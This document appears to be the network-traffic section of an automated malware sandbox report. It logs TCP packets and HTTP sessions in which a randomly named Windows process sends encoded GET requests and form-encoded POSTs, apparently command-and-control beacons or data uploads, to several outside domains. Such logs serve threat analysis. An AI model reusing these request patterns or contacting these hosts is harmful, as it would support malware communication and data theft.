                                                                                                                                  Nov 7, 2024 12:53:47.433285952 CET8049994170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:48.013895988 CET8049994170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:48.014995098 CET8049994170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:48.017570972 CET4999480192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:48.940351963 CET4999480192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:49.961582899 CET5001080192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:49.966869116 CET8050010170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:49.971592903 CET5001080192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:49.977607012 CET5001080192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:49.982659101 CET8050010170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:50.574702024 CET8050010170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:50.575670958 CET8050010170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:50.577709913 CET5001080192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:50.581552029 CET5001080192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:50.587296009 CET8050010170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:55.613395929 CET5002080192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:53:55.618232012 CET805002013.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:55.618315935 CET5002080192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:53:55.636496067 CET5002080192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:53:55.641621113 CET805002013.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:56.318183899 CET805002013.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:56.321585894 CET5002080192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:53:57.143513918 CET5002080192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:53:57.148441076 CET805002013.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:58.162117958 CET5002180192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:53:58.167084932 CET805002113.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:58.169670105 CET5002180192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:53:58.181579113 CET5002180192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:53:58.186970949 CET805002113.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:58.873285055 CET805002113.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:58.873702049 CET5002180192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:53:59.690536022 CET5002180192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:53:59.695595980 CET805002113.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:00.713577986 CET5002280192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:54:00.718466997 CET805002213.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:00.725572109 CET5002280192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:54:00.857305050 CET5002280192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:54:00.862396955 CET805002213.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:00.862433910 CET805002213.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:00.862443924 CET805002213.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:00.862453938 CET805002213.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:00.862472057 CET805002213.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:00.862488985 CET805002213.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:00.862497091 CET805002213.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:00.862555027 CET805002213.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:00.862565994 CET805002213.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:01.392457008 CET805002213.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:01.392510891 CET5002280192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:54:02.381580114 CET5002280192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:54:02.386689901 CET805002213.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:03.412920952 CET5002380192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:54:03.417962074 CET805002313.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:03.418037891 CET5002380192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:54:03.430110931 CET5002380192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:54:03.434895039 CET805002313.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:04.087508917 CET805002313.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:04.119148970 CET805002313.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:04.125673056 CET5002380192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:54:04.467715025 CET5002380192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:54:04.473582983 CET805002313.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:09.916515112 CET5002480192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:09.921452999 CET805002438.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:09.921575069 CET5002480192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:09.993041039 CET5002480192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:55:02.982115984 CET8050037162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:02.982372999 CET8050037162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:02.982384920 CET8050037162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:02.982434988 CET5003780192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:03.503243923 CET5003780192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:04.522191048 CET5003880192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:04.527093887 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:04.527173996 CET5003880192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:04.539241076 CET5003880192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:04.544255972 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:04.544397116 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:04.544406891 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:04.544410944 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:04.544423103 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:04.544467926 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:04.544483900 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:04.544497967 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:04.544554949 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.440449953 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.440479040 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.440490961 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.440505028 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.440540075 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.440538883 CET5003880192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:05.440576077 CET5003880192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:05.440586090 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.440644026 CET5003880192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:05.440675020 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.440685987 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.440691948 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.440697908 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.440845966 CET5003880192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:05.445409060 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.445421934 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.445547104 CET5003880192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:05.559365034 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.559417009 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.559601068 CET5003880192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:05.560259104 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.560384035 CET5003880192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:06.050035954 CET5003880192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:07.069401979 CET5003980192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:07.074388027 CET8050039162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:07.074464083 CET5003980192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:07.083199024 CET5003980192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:07.088107109 CET8050039162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:07.800890923 CET8050039162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:07.833936930 CET8050039162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:07.834224939 CET5003980192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:07.835731983 CET5003980192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:07.842138052 CET8050039162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:12.898284912 CET5004080192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:12.903179884 CET80500403.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:12.903254032 CET5004080192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:12.916135073 CET5004080192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:12.921025038 CET80500403.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:13.537586927 CET80500403.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:13.539866924 CET5004080192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:14.424954891 CET5004080192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:14.430001020 CET80500403.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:15.443840981 CET5004180192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:15.448781967 CET80500413.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:15.451889992 CET5004180192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:15.464133024 CET5004180192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:15.468967915 CET80500413.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:16.078177929 CET80500413.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:16.079848051 CET5004180192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:16.987309933 CET5004180192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:16.992314100 CET80500413.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:18.006231070 CET5004280192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:18.011651993 CET80500423.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:18.012610912 CET5004280192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:18.025716066 CET5004280192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:18.030617952 CET80500423.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:18.030633926 CET80500423.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:18.030653000 CET80500423.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:18.030663013 CET80500423.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:18.030670881 CET80500423.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:18.030680895 CET80500423.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:18.030692101 CET80500423.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:18.030771017 CET80500423.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:18.030790091 CET80500423.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:18.680938005 CET80500423.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:18.681000948 CET5004280192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:19.534431934 CET5004280192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:19.540935993 CET80500423.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:20.615354061 CET5004380192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:20.620254040 CET80500433.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:20.620405912 CET5004380192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:20.678822041 CET5004380192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:20.683723927 CET80500433.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:21.250017881 CET80500433.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:21.250709057 CET80500433.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:21.250768900 CET5004380192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:21.255795002 CET5004380192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:21.260592937 CET80500433.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:26.303980112 CET5004480192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:26.308917999 CET80500443.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:26.309010029 CET5004480192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:26.407049894 CET5004480192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:26.412039995 CET80500443.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:26.946882963 CET80500443.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:26.946955919 CET5004480192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:27.909712076 CET5004480192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:27.914691925 CET80500443.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:28.928385019 CET5004580192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:28.933257103 CET80500453.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:28.933345079 CET5004580192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:28.946497917 CET5004580192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:28.951241016 CET80500453.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:29.569917917 CET80500453.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:29.570106983 CET5004580192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:30.456268072 CET5004580192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:30.630666018 CET80500453.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:31.477653980 CET5004680192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:31.483602047 CET80500463.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:31.483752012 CET5004680192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:31.497761011 CET5004680192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:31.502751112 CET80500463.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:31.502808094 CET80500463.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:31.502819061 CET80500463.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:31.502827883 CET80500463.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:31.502878904 CET80500463.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:31.502890110 CET80500463.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:31.502898932 CET80500463.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:31.503112078 CET80500463.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:31.503890038 CET80500463.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:32.110892057 CET80500463.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:32.110982895 CET5004680192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:33.003074884 CET5004680192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:33.008758068 CET80500463.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:34.022331953 CET5004780192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:34.027103901 CET80500473.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:34.027196884 CET5004780192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:34.034862041 CET5004780192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:34.039817095 CET80500473.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:34.665364981 CET80500473.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:34.665970087 CET80500473.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:34.666153908 CET5004780192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:34.671721935 CET5004780192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:34.676577091 CET80500473.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:39.699104071 CET5004880192.168.2.4188.114.97.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49742 | 85.159.66.93 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 12:52:58.571275949 CET | 341 | OUT | GET /ur0f/?NBfdCRyH=zogJdywBU1O1LleSauKJSsuFV/4Ok9lE6VGlZ0lHVZSYlVhh6xxrlMSZfTqXcXU1qXLRjwj9DFcRyKew14ZiLOby4W89Tfql961FjyGPsIlp+mbksH+4eXA=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.tesetturhanzade.xyz
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Nov 7, 2024 12:52:59.414334059 CET | 225 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.14.1
                                                                                                                                  Date: Thu, 07 Nov 2024 11:52:59 GMT
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close
                                                                                                                                  X-Rate-Limit-Limit: 5s
                                                                                                                                  X-Rate-Limit-Remaining: 19
                                                                                                                                  X-Rate-Limit-Reset: 2024-11-07T11:53:04.2662658Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49810 | 91.184.0.200 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 12:53:14.669486046 CET | 615 | OUT | POST /ggvc/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.kantinestoel.online
                                                                                                                                  Origin: http://www.kantinestoel.online
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.kantinestoel.online/ggvc/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Nov 7, 2024 12:53:15.472966909 CET | 500 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:53:15 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  Content-Length: 196
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49825 | 91.184.0.200 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 12:53:17.210393906 CET | 635 | OUT | POST /ggvc/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.kantinestoel.online
                                                                                                                                  Origin: http://www.kantinestoel.online
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.kantinestoel.online/ggvc/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Nov 7, 2024 12:53:18.050215960 CET | 500 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:53:17 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  Content-Length: 196
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49840 | 91.184.0.200 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 12:53:19.756978989 CET | 10717 | OUT | POST /ggvc/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.kantinestoel.online
                                                                                                                                  Origin: http://www.kantinestoel.online
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 10305
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.kantinestoel.online/ggvc/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Nov 7, 2024 12:53:20.570370913 CET | 500 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:53:20 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  Content-Length: 196
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  4 | 192.168.2.4 | 49856 | 91.184.0.200 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:53:22.300291061 CET | 341 | OUT | GET /ggvc/?NBfdCRyH=8JknlPcTs2UijknQ0bOQpmN1M0hHcLDJyzfKPy/xZKvt3f8uoA3Cr57APZQOM8ic8BRlU5XE22T0HXZ7ivS1pP+ZXcAQJvFFEy7R+vzIZC0KJff7IqPUUhg=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.kantinestoel.online
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Nov 7, 2024 12:53:23.110702991 CET | 500 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:53:22 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  Content-Length: 196
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  5 | 192.168.2.4 | 49888 | 194.9.94.85 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:53:28.372756004 CET | 609 | OUT | POST /57zf/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.deeplungatlas.org
                                                                                                                                  Origin: http://www.deeplungatlas.org
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
